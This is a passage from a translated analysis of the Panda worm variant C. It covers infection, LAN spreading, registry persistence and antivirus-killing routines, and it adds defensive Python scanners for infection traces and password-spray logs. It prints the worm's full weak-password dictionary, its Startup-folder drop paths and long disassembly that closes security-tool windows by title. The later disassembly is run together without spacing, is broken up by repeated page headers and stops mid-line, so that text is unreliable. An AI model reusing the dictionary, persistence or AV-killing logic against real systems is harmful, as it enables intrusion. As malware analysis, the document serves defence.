After infecting a folder the virus writes the infection marker file Desktop_.ini into it. It also deletes every file on the machine whose extension is GHO, so that Ghost cannot be used to restore the system afterwards.

The CTimer_WITE_AUTORUNINF part is very simple: it copies the virus itself to the root of every partition as setup.exe and generates an autorun.inf file there.
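Added example (not from the original analysis): a triage script that applies the rules just described to a directory tree, so that a responder can list the script files the virus would have reached and the folders in which it left its Desktop_.ini marker. The folder exclusion list, the script extensions, the 10 MB limit (cmp eax, 10485760 / jge), the setup.exe exception, the leading-dot check and the marker name come from the analysis above. Everything else is an assumption made for the example: the marker content is matched as year, month and day joined by a single non-digit separator, because the separator string (asc_40A0F4) did not survive extraction; excluded folder names are pruned case-insensitively at any depth; and the sample tree is constructed here for the test.

```python
"""Triage scanner for the on-disk traces of the Panda variant C infection routine.

Added example, not the virus's code and not the article author's tooling.
"""
import os
import re
import tempfile
from pathlib import Path

# Folder names the virus skips (from the analysis). Assumption: the comparison
# is case-insensitive and applies at any depth, as Windows names are.
SKIPPED_FOLDERS = {
    "windows", "winnt", "system32", "documents and settings",
    "system volume information", "recycled", "windows nt", "windowsupdate",
    "windows media player", "outlook express", "internet explorer",
    "netmeeting", "common files", "complus applications", "messenger",
    "installshield installation information", "msn", "microsoft frontpage",
    "movie maker", "msn gamin zone",
}
SCRIPT_EXTS = {".htm", ".html", ".asp", ".php", ".jsp", ".aspx"}
MAX_INFECT_SIZE = 10485760          # cmp eax, 10485760 / jge: 10 MB and larger are skipped
MARKER_NAME = "desktop_.ini"
# Assumption: year<sep>month<sep>day, separator not recovered, optional CRLF.
MARKER_RE = re.compile(rb"^\d{4}\D\d{1,2}\D\d{1,2}\s*$")


def would_be_targeted(path: Path) -> bool:
    """Mirror the IsFileWay filters: no leading '.', not setup.exe, script
    extension, smaller than 10 MB."""
    name = path.name
    if name.startswith(".") or name.lower() == "setup.exe":
        return False
    if path.suffix.lower() not in SCRIPT_EXTS:
        return False
    return path.stat().st_size < MAX_INFECT_SIZE


def is_marker(path: Path) -> bool:
    """A Desktop_.ini is treated as the virus's marker only if its whole
    content is a date; a real desktop.ini never looks like that."""
    try:
        data = path.read_bytes()
    except OSError:
        return False
    return len(data) <= 16 and MARKER_RE.match(data) is not None


def scan(root) -> dict:
    """Walk `root` the way Infect_Path would and report what it finds."""
    root = Path(root)
    result = {
        "root_dropper": (root / "setup.exe").is_file() and (root / "autorun.inf").is_file(),
        "markers": [],   # folders carrying a date-stamped Desktop_.ini
        "targets": [],   # script files the virus would have modified
    }
    for dirpath, dirnames, filenames in os.walk(root):
        # Prune in place so os.walk never descends into the skipped folders.
        dirnames[:] = [d for d in dirnames if d.lower() not in SKIPPED_FOLDERS]
        folder = Path(dirpath)
        for fn in filenames:
            p = folder / fn
            if fn.lower() == MARKER_NAME:
                if is_marker(p):
                    result["markers"].append(folder.relative_to(root).as_posix())
            elif would_be_targeted(p):
                result["targets"].append(p.relative_to(root).as_posix())
    result["markers"].sort()
    result["targets"].sort()
    return result


def build_sample_tree() -> str:
    """Constructed sample data: a fake infected drive in a temp directory."""
    root = Path(tempfile.mkdtemp(prefix="panda_c_"))
    (root / "setup.exe").write_bytes(b"MZ placeholder")          # constructed
    (root / "autorun.inf").write_text("[AutoRun]\nOPEN=setup.exe\n")
    (root / "Desktop_.ini").write_bytes(b"2007-1-15\r\n")        # date marker
    site = root / "site"
    site.mkdir()
    (site / "index.htm").write_text("<html></html>")             # would be infected
    (site / ".hidden.php").write_text("<?php ?>")                # leading '.': skipped
    (site / "Desktop_.ini").write_bytes(b"2007-1-15\r\n")
    with open(site / "big.html", "wb") as f:
        f.truncate(MAX_INFECT_SIZE)                              # exactly 10 MB: skipped (jge)
    win = root / "WINDOWS" / "web"
    win.mkdir(parents=True)
    (win / "page.htm").write_text("<html></html>")               # excluded folder
    docs = root / "docs"
    docs.mkdir()
    (docs / "readme.txt").write_text("not a script")
    (docs / "Desktop_.ini").write_text("[.ShellClassInfo]\n")   # legitimate, not a marker
    return str(root)


if __name__ == "__main__":
    for key, value in scan(build_sample_tree()).items():
        print(key, value)
```

Run it against a mounted copy of the disk rather than the live system: the marker files are written with attribute 7 (read-only, hidden, system), which os.walk still sees, but an infected machine cannot show hidden files through Explorer.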
Next comes the Infect_NetWork part; the key code only appears several calls deep. This is the part that spreads across the LAN (it carries some risk, so I am not pasting the detailed analysis). The virus enumerates the LAN the user's machine is on, and when it can connect to a machine it copies itself to one of the following locations on the target (which one depends on the OS):

  \Documents and Settings\All Users\Start Menu\Programs\Startup\
  \Documents and Settings\All Users\「开始」菜单\程序\启动\   (the Chinese-localized Startup folder)
  \WINDOWS\Start Menu\Programs\Startup\
  \WINNT\Profiles\All Users\Start Menu\Programs\Startup\

The copy is named GameSetup.exe, and the virus then adds a remote scheduled task. At the same time it attempts weak-password attacks against machines on the intranet. Its dictionary is:

  1234, password, 6969, harley, 123456, golf, pussy, mustang, 1111, shadow, 1313, fish, 5150, 7777, qwerty, baseball, 2112, letmein, 12345678, 12345, ccc, admin, 5201314, qq520, 1, 12, 123, 1234567, 123456789, 654321, 54321, 111, 000000, abc, pw, 11111111, 88888888, pass, passwd, database, abcd, abc123, sybase, 123qwe, server, computer, 520, super, 123asd, ihavenopass, godblessyou, enable, xp, 2002, 2003, 2600, alpha, 110, 111111, 121212, 123123, 1234qwer, 123abc, 007, a, aaa, patrick, pat, administrator, root, sex, god, fuckyou, fuck, test, test123, temp, temp123, win, pc, asdf, pwd, qwer, yxcv, zxcv, home, xxx, owner, login, Login, pw123, love, mypc, mypc123, admin123, mypass, mypass123, 901100, Administrator, Guest, admin, Root

Looking at that pile of weak passwords, I am sure some people's passwords are in the list. Once a weak-password attack succeeds, the virus infects the target machine.

That covers every infection module of the virus.
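Added example (not part of the original article): detection logic for the LAN credential spray described above, run over constructed logon records. A dictionary of this size tried against one host produces a dense run of failed network logons from a single source, and a success right after that run is the moment the host is lost. The record format used here (timestamp, source IP, target user, result) is an assumption for the example; on a real Windows 2003 host the data would come from the Security event log, and the window and threshold are tuning values chosen for the example, not numbers taken from the analysis.

```python
"""Flag a weak-password spray of the kind the Panda worm runs over the LAN.

Added example; the log format and the thresholds are assumptions, not data
from the analysed sample.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed record format: <YYYY-MM-DD HH:MM:SS> <source_ip> <target_user> FAIL|SUCCESS
LINE_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (FAIL|SUCCESS)$")


def parse_log(text: str) -> list:
    """Return (timestamp, source, user, succeeded) tuples sorted by time."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue                      # ignore anything that is not a logon record
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        records.append((ts, m.group(2), m.group(3), m.group(4) == "SUCCESS"))
    records.sort(key=lambda r: r[0])
    return records


def detect_spray(records, window=timedelta(seconds=60), threshold=20) -> dict:
    """Flag every source that produces >= threshold failures inside `window`.

    A user mistyping a password gives two or three failures; the worm walks
    its whole dictionary, so it crosses the threshold within seconds.  A
    success from an already flagged source is recorded as the likely
    compromise (the worm then copies GameSetup.exe to the Startup folder).
    """
    recent = defaultdict(deque)          # source -> timestamps inside the window
    total_fail = defaultdict(int)
    users = defaultdict(set)
    flagged = {}
    for ts, src, user, ok in records:
        if ok:
            if src in flagged:
                flagged[src]["success_after_burst"] = user
            continue
        total_fail[src] += 1
        users[src].add(user)
        q = recent[src]
        q.append(ts)
        while q and ts - q[0] > window:  # drop failures that fell out of the window
            q.popleft()
        if len(q) >= threshold and src not in flagged:
            flagged[src] = {"first_seen": q[0], "success_after_burst": None}
    for src, info in flagged.items():
        info["failures"] = total_fail[src]
        info["users"] = sorted(users[src])
    return flagged


def build_sample_log() -> str:
    """Constructed sample: one worm-style burst, one typo, one slow trickle."""
    t0 = datetime(2007, 1, 15, 9, 0, 0)
    fmt = "%Y-%m-%d %H:%M:%S"
    lines = []
    # 192.168.1.23 tries 25 guesses at Administrator in 25 s, then gets in.
    for i in range(25):
        lines.append(f"{(t0 + timedelta(seconds=i)):{fmt}} 192.168.1.23 Administrator FAIL")
    lines.append(f"{(t0 + timedelta(seconds=26)):{fmt}} 192.168.1.23 Administrator SUCCESS")
    # 192.168.1.40: a user mistypes twice and then logs on; must not be flagged.
    for i in range(2):
        lines.append(f"{(t0 + timedelta(minutes=5, seconds=i)):{fmt}} 192.168.1.40 alice FAIL")
    lines.append(f"{(t0 + timedelta(minutes=5, seconds=3)):{fmt}} 192.168.1.40 alice SUCCESS")
    # 192.168.1.77: 25 failures spread two minutes apart; never 20 inside one window.
    for i in range(25):
        lines.append(f"{(t0 + timedelta(minutes=10 + 2 * i)):{fmt}} 192.168.1.77 backup FAIL")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    for src, info in detect_spray(parse_log(build_sample_log())).items():
        print(src, info)
```

The slow source shows why the window matters: a daily count alone would flag it, while the worm's dictionary run is over in well under a minute. Tune the threshold below the dictionary size, never at it, since the first successful guess ends the burst early.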
Now for the download and anti-antivirus part, starting with Kill_AV_GetNetInfo:

CODE:0040C9F0  ; =============== S U B R O U T I N E ===============
CODE:0040C9F0
CODE:0040C9F0  Kill_AV_GetNetInfo proc near           ; CODE XREF: start+A8p
CODE:0040C9F0  cmp     ds:d0word_40D2B0, 0
CODE:0040C9F7  jz      short loc_40C9FE
CODE:0040C9F9  call    sub_40CA5C
CODE:0040C9FE
CODE:0040C9FE  loc_40C9FE:                            ; CODE XREF: Kill_AV_GetNetInfo+7j
CODE:0040C9FE  push    offset Wirte_AutoRun_Reg       ; lpTimerFunc
CODE:0040CA03  push    3E8h                           ; uElapse = 1000 ms
CODE:0040CA08  push    0                              ; nIDEvent
CODE:0040CA0A  push    0                              ; hWnd
CODE:0040CA0C  call    SetTimer
CODE:0040CA11  mov     ds:dword_40D2B0, eax
CODE:0040CA16  push    offset Timer_Download          ; lpTimerFunc
CODE:0040CA1B  push    124F80h                        ; uElapse = 1200000 ms (20 minutes)
CODE:0040CA20  push    0                              ; nIDEvent
CODE:0040CA22  push    0                              ; hWnd
CODE:0040CA24  call    SetTimer
CODE:0040CA29  mov     ds:dword_40D2B4, eax
CODE:0040CA2E  push    offset Download_and_KillShare  ; lpTimerFunc
CODE:0040CA33  push    2710h                          ; uElapse = 10000 ms
CODE:0040CA38  push    0                              ; nIDEvent
CODE:0040CA3A  push    0                              ; hWnd
CODE:0040CA3C  call    SetTimer
CODE:0040CA41  mov     ds:uIDEvent, eax
CODE:0040CA46  push    offset Timer_kill_AV           ; lpTimerFunc
CODE:0040CA4B  push    1770h                          ; uElapse = 6000 ms
CODE:0040CA50  push    0                              ; nIDEvent
CODE:0040CA52  push    0                              ; hWnd
CODE:0040CA54  call    SetTimer
CODE:0040CA59  retn
CODE:0040CA59  Kill_AV_GetNetInfo endp
CODE:0040CA59

The four uElapse values are the intervals in the timer table earlier in this article. The details of each module follow.

Writing the registry autostart entry:

CODE:0040C84C  ; =============== S U B R O U T I N E ===============
CODE:0040C84C
CODE:0040C84C  ; Attributes: bp-based frame
CODE:0040C84C
CODE:0040C84C  ; void __stdcall Wirte_AutoRun_Reg(HWND, UINT, UINT, DWORD)
CODE:0040C84C  Wirte_AutoRun_Reg proc near            ; DATA XREF: Kill_AV_GetNetInfo:loc_40C9FEo
CODE:0040C84C
CODE:0040C84C  var_8 = dword ptr -8
CODE:0040C84C  var_4 = dword ptr -4
CODE:0040C84C
CODE:0040C84C  push    ebp
CODE:0040C84D  mov     ebp, esp
CODE:0040C84F  push    0
CODE:0040C851  push    0
CODE:0040C853  xor     eax, eax
CODE:0040C855  push    ebp
CODE:0040C856  push    offset j_@System@@HandleFinally$qqrv_36
CODE:0040C85B  push    dword ptr fs:[eax]
CODE:0040C85E  mov     fs:[eax], esp
CODE:0040C861  call    Kill_AV_Process                ; every second: kill AV windows first, then re-arm the Run entry
CODE:0040C866  lea     eax, [ebp+var_8]
CODE:0040C869  call    GetSysDir
CODE:0040C86E  push    [ebp+var_8]
CODE:0040C871  push    offset aDrivers_0              ; "drivers\\"
CODE:0040C876  push    offset aSpoclsv_exe_0          ; "spoclsv.exe"
CODE:0040C87B  lea     eax, [ebp+var_4]
CODE:0040C87E  mov     edx, 3
CODE:0040C883  call    @System@@LStrCatN$qqrv         ; %System%\drivers\spoclsv.exe
CODE:0040C888  mov     eax, [ebp+var_4]
CODE:0040C88B  call    @System@@LStrToPChar$qqrx17System@AnsiString
CODE:0040C890  push    eax                            ; int
CODE:0040C891  mov     ecx, offset aSvcshare          ; "svcshare" (value name)
CODE:0040C896  mov     edx, offset aSoftwareMicros    ; "Software\\Microsoft\\Windows\\CurrentVersi"...
CODE:0040C89B  mov     eax, HKEY_CURRENT_USER
CODE:0040C8A0  call    Write_Reg                      ; HKCU autostart value svcshare = path to spoclsv.exe
CODE:0040C8A5  xor     ecx, ecx
CODE:0040C8A7  mov     edx, offset aSoftwareMicr_0    ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
CODE:0040C8AC  mov     eax, HKEY_LOCAL_MACHINE
CODE:0040C8B1  call    sub_405B00
CODE:0040C8B6  xor     eax, eax
CODE:0040C8B8  pop     edx
CODE:0040C8B9  pop     ecx
CODE:0040C8BA  pop     ecx
CODE:0040C8BB  mov     fs:[eax], edx
CODE:0040C8BE  push    offset loc_40C8D8
CODE:0040C8C3
CODE:0040C8C3  loc_40C8C3:                            ; CODE XREF: CODE:0040C8D6j
CODE:0040C8C3  lea     eax, [ebp+var_8]
CODE:0040C8C6  mov     edx, 2
CODE:0040C8CB  call    @System@@LStrArrayClr$qqrpvi
CODE:0040C8D0  retn
CODE:0040C8D0  Wirte_AutoRun_Reg endp                 ; sp = 1Ch

Because this callback runs every 1000 ms, deleting the Run value by hand is undone a second later while spoclsv.exe is still running; the process has to be stopped first.

Stepping into Kill_AV_Process, which starts a thread whose routine is Thread_Kill_av:

CODE:004062C8  ; =============== S U B R O U T I N E ===============
CODE:004062C8
CODE:004062C8  ; Attributes: bp-based frame
CODE:004062C8
CODE:004062C8  ; DWORD __stdcall Thread_Kill_av(LPVOID)
CODE:004062C8  Thread_Kill_av proc near               ; DATA XREF: Kill_AV_Process+6o
CODE:004062C8
CODE:004062C8  var_F0 = dword ptr -0F0h
CODE:004062C8  var_EC = dword ptr -0ECh
CODE:004062C8  var_E8 = dword ptr -0E8h
CODE:004062C8  var_E4 = dword ptr -0E4h
CODE:004062C8  var_E0 = dword ptr -0E0h
CODE:004062C8  var_DC = dword ptr -0DCh
CODE:004062C8  var_D8 = dword ptr -0D8h
CODE:004062C8  var_D4 = dword ptr -0D4h
CODE:004062C8  var_D0 = dword ptr -0D0h
CODE:004062C8  var_CC = dword ptr -0CCh
CODE:004062C8  var_C8 = dword ptr -0C8h
CODE:004062C8  var_C4 = dword ptr -0C4h
comURL:www.
Loveboom.
net三十八CODE:004062C8var_C0=dwordptr0C0hCODE:004062C8var_BC=dwordptr0BChCODE:004062C8var_B8=dwordptr0B8hCODE:004062C8var_B4=dwordptr0B4hCODE:004062C8var_B0=dwordptr0B0hCODE:004062C8var_AC=dwordptr0AChCODE:004062C8var_A8=dwordptr0A8hCODE:004062C8var_A4=dwordptr0A4hCODE:004062C8var_A0=dwordptr0A0hCODE:004062C8var_9C=dwordptr9ChCODE:004062C8var_98=dwordptr98hCODE:004062C8var_94=dwordptr94hCODE:004062C8var_90=dwordptr90hCODE:004062C8var_8C=dwordptr8ChCODE:004062C8var_88=dwordptr88hCODE:004062C8var_84=dwordptr84hCODE:004062C8var_80=dwordptr80hCODE:004062C8var_7C=dwordptr7ChCODE:004062C8var_78=dwordptr78hCODE:004062C8var_74=dwordptr74hCODE:004062C8var_70=dwordptr70hCODE:004062C8var_6C=dwordptr6ChCODE:004062C8var_66=dwordptr66hCODE:004062C8CODE:004062C8pushebpCODE:004062C9movebp,espCODE:004062CBmovecx,1EhCODE:004062D0CODE:004062D0loc_4062D0:CODEXREF:Thread_Kill_av+DjThread_Kill_av+DjCODE:004062D0push0CODE:004062D2push0CODE:004062D4dececxCODE:004062D5jnzshortloc_4062D0CODE:004062D7pushebxCODE:004062D8pushesiCODE:004062D9pushediCODE:004062DAleaesi,[ebp+var_66+1]CODE:004062DDxoreax,eaxCODE:004062DFpushebpCODE:004062E0pushoffsetj_@System@@HandleFinally$qqrv_14CODE:004062E5pushdwordptrfs:[eax]熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net三十九CODE:004062E8movfs:[eax],espCODE:004062EBcallAdjustPCODE:004062F0xorebx,ebxCODE:004062F2callGetDesktopWindowCODE:004062F7movedi,eaxCODE:004062F9CODE:004062F9loc_4062F9:CODEXREF:Thread_Kill_av+697jThread_Kill_av+697jCODE:004062F9push0LPCSTRCODE:004062FBpush0LPCSTRCODE:004062FDpushebxHWNDCODE:004062FEpushediHWNDCODE:004062FFcallFindWindowExACODE:00406304movebx,eaxCODE:00406306push65hnMaxCountCODE:00406308pushesilpStringCODE:00406309pushebxhWndCODE:0040630AcallGetWindowTextACODE:0040630Fleaeax,[ebp+var_6C]CODE:00406312movedx,esiCODE:00406314movecx,65hCODE:00406319call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:0040631Emovedx,[ebp+var_6C]CODE:00406321moveax,offsetasc_406C08"天网"CODE:00406326call@System@@LStrPos$qqrvCODE:0040632Btesteax,eaxCODE:0040632Djzshortloc_40633BCODE:0040632Fpush0lParamCODE:00406331push0wParamCODE:00406333push12hMsgCODE:00406335pushebxhWndCODE:00406336callPostMessageACODE:0040633BCODE:0040633Bloc_40633B:CODEXREF:Thread_Kill_av+65jThread_Kill_av+65jCODE:0040633Bleaeax,[ebp+var_70]CODE:0040633Emovedx,esiCODE:00406340movecx,65hCODE:00406345call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:0040634Amovedx,[ebp+var_70]CODE:0040634Dmoveax,offsetasc_406C18"防火墙"CODE:00406352call@System@@LStrPos$qqrv熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net四十CODE:00406357testeax,eaxCODE:00406359jzshortloc_406367CODE:0040635Bpush0lParamCODE:0040635Dpush0wParamCODE:0040635Fpush12hMsgCODE:00406361pushebxhWndCODE:00406362callPostMessageACODE:00406367CODE:00406367loc_406367:CODEXREF:Thread_Kill_av+91jThread_Kill_av+91jCODE:00406367leaeax,[ebp+var_74]CODE:0040636Amovedx,esiCODE:0040636Cmovecx,65hCODE:00406371call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:00406376movedx,[ebp+var_74]CODE:00406379moveax,offsetasc_406C28"进程"CODE:0040637Ecall@System@@LStrPos$qqrvCODE:00406383testeax,eaxCODE:00406385jzshortloc_406393CODE:00406387push0lParamCODE:00406389push0wParamCODE:0040638BpushWM_QUITMsgCODE:0040638DpushebxhWndCODE:0040638EcallPostMessageACODE:00406393CODE:00406393loc_406393:CODEXREF:Thread_Kill_av+BDjThread_Kill_av+BDjCODE:00406393leaeax,[ebp+var_78]CODE:00406396movedx,esiCODE:00406398movecx,65hCODE:0040639Dcall@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:004063A2movedx,[ebp+var_78]CODE:004063A5moveax,offsetaVirusscan"VirusScan"CODE:004063AAcall@System@@LStrPos$qqrvCODE:004063AFtesteax,eaxCODE:004063B1jzshortloc_4063BFCODE:004063B3push0lParamCODE:004063B5push0wParamCODE:004063B7push12hMsgCODE:004063B9pushebxhWndCODE:004063BAcallPostMessageA熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net四十一CODE:004063BFCODE:004063BFloc_4063BF:CODEXREF:Thread_Kill_av+E9jThread_Kill_av+E9jCODE:004063BFleaeax,[ebp+var_7C]CODE:004063C2movedx,esiCODE:004063C4movecx,65hCODE:004063C9call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:004063CEmovedx,[ebp+var_7C]CODE:004063D1moveax,offsetaNod32"NOD32"CODE:004063D6call@System@@LStrPos$qqrvCODE:004063DBtesteax,eaxCODE:004063DDjzshortloc_4063EBCODE:004063DFpush0lParamCODE:004063E1push0wParamCODE:004063E3push12hMsgCODE:004063E5pushebxhWndCODE:004063E6callPostMessageACODE:004063EBCODE:004063EBloc_4063EB:CODEXREF:Thread_Kill_av+115jThread_Kill_av+115jCODE:004063EBleaeax,[ebp+var_80]CODE:004063EEmovedx,esiCODE:004063F0movecx,65hCODE:004063F5call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:004063FAmovedx,[ebp+var_80]CODE:004063FDmoveax,offsetaQ"网镖"CODE:00406402call@System@@LStrPos$qqrvCODE:00406407testeax,eaxCODE:00406409jzshortloc_406417CODE:0040640Bpush0lParamCODE:0040640Dpush0wParamCODE:0040640Fpush12hMsgCODE:00406411pushebxhWndCODE:00406412callPostMessageACODE:00406417CODE:00406417loc_406417:CODEXREF:Thread_Kill_av+141jThread_Kill_av+141jCODE:00406417leaeax,[ebp+var_84]CODE:0040641Dmovedx,esiCODE:0040641Fmovecx,65hCODE:00406424call@System@@LStrFromArray$qqrr17System@AnsiStringpci熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net四十二CODE:00406429movedx,[ebp+var_84]CODE:0040642Fmoveax,offsetasc_406C6C"杀毒"CODE:00406434call@System@@LStrPos$qqrvCODE:00406439testeax,eaxCODE:0040643Bjzshortloc_406449CODE:0040643Dpush0lParamCODE:0040643Fpush0wParamCODE:00406441push12hMsgCODE:00406443pushebxhWndCODE:00406444callPostMessageACODE:00406449CODE:00406449loc_406449:CODEXREF:Thread_Kill_av+173jThread_Kill_av+173jCODE:00406449leaeax,[ebp+var_88]CODE:0040644Fmovedx,esiCODE:00406451movecx,65hCODE:00406456call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:0040645Bmovedx,[ebp+var_88]CODE:00406461moveax,offsetasc_406C7C"毒霸"CODE:00406466call@System@@LStrPos$qqrvCODE:0040646Btesteax,eaxCODE:0040646Djzshortloc_40647BCODE:0040646Fpush0lParamCODE:00406471push0wParamCODE:00406473push12hMsgCODE:00406475pushebxhWndCODE:00406476callPostMessageACODE:0040647BCODE:0040647Bloc_40647B:CODEXREF:Thread_Kill_av+1A5jThread_Kill_av+1A5jCODE:0040647Bleaeax,[ebp+var_8C]CODE:00406481movedx,esiCODE:00406483movecx,65hCODE:00406488call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:0040648Dmovedx,[ebp+var_8C]CODE:00406493moveax,offsetasc_406C8C"瑞星"CODE:00406498call@System@@LStrPos$qqrvCODE:0040649Dtesteax,eaxCODE:0040649Fjzshortloc_4064ADCODE:004064A1push0lParamCODE:004064A3push0wParamCODE:004064A5push12hMsg熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net四十三CODE:004064A7pushebxhWndCODE:004064A8callPostMessageACODE:004064ADCODE:004064ADloc_4064AD:CODEXREF:Thread_Kill_av+1D7jThread_Kill_av+1D7jCODE:004064ADleaeax,[ebp+var_90]CODE:004064B3movedx,esiCODE:004064B5movecx,65hCODE:004064BAcall@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:004064BFmovedx,[ebp+var_90]CODE:004064C5moveax,offsetaN"江民"CODE:004064CAcall@System@@LStrPos$qqrvCODE:004064CFtesteax,eaxCODE:004064D1jzshortloc_4064DFCODE:004064D3push0lParamCODE:004064D5push0wParamCODE:004064D7push12hMsgCODE:004064D9pushebxhWndCODE:004064DAcallPostMessageACODE:004064DFCODE:004064DFloc_4064DF:CODEXREF:Thread_Kill_av+209jThread_Kill_av+209jCODE:004064DFleaeax,[ebp+var_94]CODE:004064E5movedx,esiCODE:004064E7movecx,65hCODE:004064ECcall@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:004064F1movedx,[ebp+var_94]CODE:004064F7moveax,offsetaIe"黄山IE"CODE:004064FCcall@System@@LStrPos$qqrvCODE:00406501testeax,eaxCODE:00406503jzshortloc_406511CODE:00406505push0lParamCODE:00406507push0wParamCODE:00406509push12hMsgCODE:0040650BpushebxhWndCODE:0040650CcallPostMessageACODE:00406511CODE:00406511loc_406511:CODEXREF:Thread_Kill_av+23BjThread_Kill_av+23BjCODE:00406511leaeax,[ebp+var_98]熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net四十四CODE:00406517movedx,esiCODE:00406519movecx,65hCODE:0040651Ecall@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:00406523movedx,[ebp+var_98]CODE:00406529moveax,offsetaM"超级兔子"CODE:0040652Ecall@System@@LStrPos$qqrvCODE:00406533testeax,eaxCODE:00406535jzshortloc_406543CODE:00406537push0lParamCODE:00406539push0wParamCODE:0040653Bpush12hMsgCODE:0040653DpushebxhWndCODE:0040653EcallPostMessageACODE:00406543CODE:00406543loc_406543:CODEXREF:Thread_Kill_av+26DjThread_Kill_av+26DjCODE:00406543leaeax,[ebp+var_9C]CODE:00406549movedx,esiCODE:0040654Bmovecx,65hCODE:00406550call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:00406555movedx,[ebp+var_9C]CODE:0040655Bmoveax,offsetaPJ"优化大师"CODE:00406560call@System@@LStrPos$qqrvCODE:00406565testeax,eaxCODE:00406567jzshortloc_406575CODE:00406569push0lParamCODE:0040656Bpush0wParamCODE:0040656Dpush12hMsgCODE:0040656FpushebxhWndCODE:00406570callPostMessageACODE:00406575CODE:00406575loc_406575:CODEXREF:Thread_Kill_av+29FjThread_Kill_av+29FjCODE:00406575leaeax,[ebp+var_A0]CODE:0040657Bmovedx,esiCODE:0040657Dmovecx,65hCODE:00406582call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:00406587movedx,[ebp+var_A0]CODE:0040658Dmoveax,offsetaAX"木马清道夫"CODE:00406592call@System@@LStrPos$qqrvCODE:00406597testeax,eax熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net四十五CODE:00406599jzshortloc_4065A7CODE:0040659Bpush0lParamCODE:0040659Dpush0wParamCODE:0040659Fpush12hMsgCODE:004065A1pushebxhWndCODE:004065A2callPostMessageACODE:004065A7CODE:004065A7loc_4065A7:CODEXREF:Thread_Kill_av+2D1jThread_Kill_av+2D1jCODE:004065A7leaeax,[ebp+var_A4]CODE:004065ADmovedx,esiCODE:004065AFmovecx,65hCODE:004065B4call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:004065B9movedx,[ebp+var_A4]CODE:004065BFmoveax,offsetaRX"木馬清道夫"CODE:004065C4call@System@@LStrPos$qqrvCODE:004065C9testeax,eaxCODE:004065CBjzshortloc_4065D9CODE:004065CDpush0lParamCODE:004065CFpush0wParamCODE:004065D1push12hMsgCODE:004065D3pushebxhWndCODE:004065D4callPostMessageACODE:004065D9CODE:004065D9loc_4065D9:CODEXREF:Thread_Kill_av+303jThread_Kill_av+303jCODE:004065D9leaeax,[ebp+var_A8]CODE:004065DFmovedx,esiCODE:004065E1movecx,65hCODE:004065E6call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:004065EBmovedx,[ebp+var_A8]CODE:004065F1moveax,offsetaQqB"QQ病毒"CODE:004065F6call@System@@LStrPos$qqrvCODE:004065FBtesteax,eaxCODE:004065FDjzshortloc_40660BCODE:004065FFpush0lParamCODE:00406601push0wParamCODE:00406603push12hMsgCODE:00406605pushebxhWndCODE:00406606callPostMessageA熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net四十六CODE:0040660BCODE:0040660Bloc_40660B:CODEXREF:Thread_Kill_av+335jThread_Kill_av+335jCODE:0040660Bleaeax,[ebp+var_AC]CODE:00406611movedx,esiCODE:00406613movecx,65hCODE:00406618call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:0040661Dmovedx,[ebp+var_AC]CODE:00406623moveax,offsetaVSARN"注册表编辑器"CODE:00406628call@System@@LStrPos$qqrvCODE:0040662Dtesteax,eaxCODE:0040662Fjzshortloc_40663DCODE:00406631push0lParamCODE:00406633push0wParamCODE:00406635push12hMsgCODE:00406637pushebxhWndCODE:00406638callPostMessageACODE:0040663DCODE:0040663Dloc_40663D:CODEXREF:Thread_Kill_av+367jThread_Kill_av+367jCODE:0040663Dleaeax,[ebp+var_B0]CODE:00406643movedx,esiCODE:00406645movecx,65hCODE:0040664Acall@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:0040664Fmovedx,[ebp+var_B0]CODE:00406655moveax,offsetaF_2"系统配置实用程序"CODE:0040665Acall@System@@LStrPos$qqrvCODE:0040665Ftesteax,eaxCODE:00406661jzshortloc_40666FCODE:00406663push0lParamCODE:00406665push0wParamCODE:00406667push12hMsgCODE:00406669pushebxhWndCODE:0040666AcallPostMessageACODE:0040666FCODE:0040666Floc_40666F:CODEXREF:Thread_Kill_av+399jThread_Kill_av+399jCODE:0040666Fleaeax,[ebp+var_B4]CODE:00406675movedx,esiCODE:00406677movecx,65hCODE:0040667Ccall熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
